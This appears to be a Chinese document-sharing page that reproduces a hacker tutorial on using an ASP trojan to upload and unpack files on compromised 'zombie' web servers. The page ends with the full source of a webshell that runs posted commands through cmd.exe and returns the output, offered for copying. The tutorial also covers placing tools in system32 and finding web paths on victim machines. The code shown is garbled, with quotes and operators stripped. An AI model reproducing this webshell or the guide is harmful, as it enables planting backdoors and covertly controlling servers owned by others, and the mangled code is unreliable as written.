用asp木马实现ftp和解压缩_.docx

上传人:PIYPING 文档编号:11551213 上传时间:2021-08-23 格式:DOCX 页数:5 大小:13.11KB
返回 下载 相关 举报
用asp木马实现ftp和解压缩_.docx_第1页
第1页 / 共5页
用asp木马实现ftp和解压缩_.docx_第2页
第2页 / 共5页
用asp木马实现ftp和解压缩_.docx_第3页
第3页 / 共5页
用asp木马实现ftp和解压缩_.docx_第4页
第4页 / 共5页
用asp木马实现ftp和解压缩_.docx_第5页
第5页 / 共5页
亲,该文档总共5页,全部预览完了,如果喜欢就下载吧!
资源描述

《用asp木马实现ftp和解压缩_.docx》由会员分享,可在线阅读,更多相关《用asp木马实现ftp和解压缩_.docx(5页珍藏版)》请在三一文库上搜索。

1、用asp木马实现ftp和解压缩_ 我想大家都有一些开了80端口的肉鸡吧,假如是国内的出于平安就不要往下看了,假如不不妨往下看一下,小弟献丑了,以求抛砖引玉. 在肉鸡上放网站最麻烦的可能就是更新和上传大量的文件了,终端服务大白天简单被发觉,自己开个ftp又不放心.自己在网上转了一圈发觉通过结合无组件上传和asp木马可以轻松实现. asp木马大家都很熟识,无非就是一个cmd,有什么作用啊,你别急,听我慢慢说嘛.整体思路就是先通过ftp,139,或者winshell上传一个无组件asp程序.我选择了化境的webedit(其实这个已经不是一个单纯的无组件上传的工具了,通过它还可以修改,删除文件/名目,

2、可以用来更新页面喔,作起来广告了,我跟他没亲戚啊,闪过一个flying bottle.连续)和一个asp木马(假如,实在懒得找.最终带着源码,粘贴另存为asp文件即可),记住可都要在肉鸡的web名目喔.其实大多的问题webedit都可以解决,不过假如有许多文件一个一个上传可就麻烦了,怎么办?这下asp木马用上了.找一个rar.exe(全部装过了winrar的名目都有,说不定肉鸡上已经安好了,假如是别的指令行的解压缩工具也可以喔)把它拷到%systemroot%system32下.上传.zip或者.rar文件到该肉鸡的web名目.在扫瞄器地址栏里打开asp木马(临时称之为trojan.asp),

3、在text文本框里输入rar -x source.rar path解压缩胜利,v,且慢如何得到web名目的肯定路径(path)呢?我用的是用土方法,修改trojan.asp加入一行转换虚拟名目成肯定路径并输出的语句% =server.mappath(.) %,.可以任意改成任何的相对虚拟名目. 只是供应一个思路,假如哪个牛人可写一个asp的解压缩那更好喽,不过?谁会呢,我不会,你会吗?至于如何隐蔽虚拟名目,支持简体中文显示等就不是该篇的商量之列了,老话,平安第一,一般放个小的论坛或谈天室就可以了,假如真放个个人主页,还把自己的联系地址,电话号码也留给人家就不太好了.ps.junesun建议挺直

4、作成自解压,不知会不会弹出对话框。 -以下是asp木马的源码,建议在后加上% =server.mappath(.) %- % language=vbscript % % dim oscript dim oscriptnet dim ofilesys, ofile dim szcmd, sztempfile on error resume next - create the com objects that we will be using - set oscript = server.createobject(wscript.shell) set oscriptnet = server.cre

5、ateobject(work) set ofilesys = server.createobject(scripting.filesystemobject) - check for a command that we have posted - szcmd = request.form(.cmd) if (szcmd ) then - use a poor mans pipe . a temp file - sztempfile = c: ofilesys.gettempname( ) call oscript.run (cmd.exe /c szcmd sztempfile, 0, true

6、) set ofile = ofilesys.opentextfile (sztempfile, 1, false, 0) end if % html body form action=%= request.servervariables(url) % method=post input type=text name=.cmd size=45 value=%= szcmd % input type=submit value=run /form pre % if (isobject(ofile) then - read the output from our command and remove the temp file - on error resume next response.write server.htmlencode(ofile.readall) ofile.close call ofilesys.deletefile(sztempfile, true) end if % /body /html 更多信息请查看IT技术专栏 .

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 科普知识


经营许可证编号:宁ICP备18001539号-1